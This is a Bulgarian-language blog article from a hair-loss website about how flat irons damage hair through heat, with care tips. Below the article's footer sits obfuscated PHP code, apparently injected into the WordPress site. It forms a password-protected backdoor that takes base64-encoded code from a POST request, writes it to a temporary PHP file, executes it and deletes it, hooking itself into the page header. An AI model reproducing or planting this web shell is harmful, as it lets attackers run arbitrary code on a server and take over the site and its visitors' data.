Как пресата уврежда косата | Косопад

Как пресата уврежда косата

Много жени обичат често да сменят прическата си, а за да го постигнат, обикновено използват пресата за изправяне. Безопасни ли са косата този тип уреди, или напротив, увреждат я?

presa-izpravyane

Преди да навлезем в детайли, трябва да споменем, че самата идея да променим характеристиките на косата си, представлява риск. Всеки човек има свои генетични особености, които определят какъв цвят да е косата, колко гъста да е, колко чуплива да е и пр. Промяната на тези вродени характеристики представлява опасност за здравето на косата.

Пресата за изправяне на косата е сред уредите, които увреждат косата. Има естетическа тежест, но високата температура не е полезна за косъма. Прекаляването или неправилната употреба на пресата могат да ускорят косопада, като изсушат косата и я направят чуплива.

Всяка коса реагира различно на излагането на температура, в зависимост от структурата, фактори като боядисване. Колкото по- тънка е косата, по- чувствителна е към външни влияния, като високата температура.

presa-kosa

Мазната коса, от друга страна, устоява повече на високата температура от сухата, защото мазнината я предпазва. Когато косата е боядисана, горещината на уреда по- бързо премахва цвета. Боите не са устойчиви на високи температури.

Защо топлото уврежда косата?

Температурата на пресата уврежда структурата на кератина. Тъй като тази нова форма не е естествена, косата става по- чуплива и по- чувствителна на външна агресия.

Колкото повече минаваме, толкова повече се увеличава риска. Хващайте малки кичури и не минавайте повече от два пъти.

Бъдете умерени в употребата на пресата. Поддържайте косата с хидратиращи маски. Изберете качествена преса. Използвайте протектор срещу високата температура.

07. декември 2014 19:49:32 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}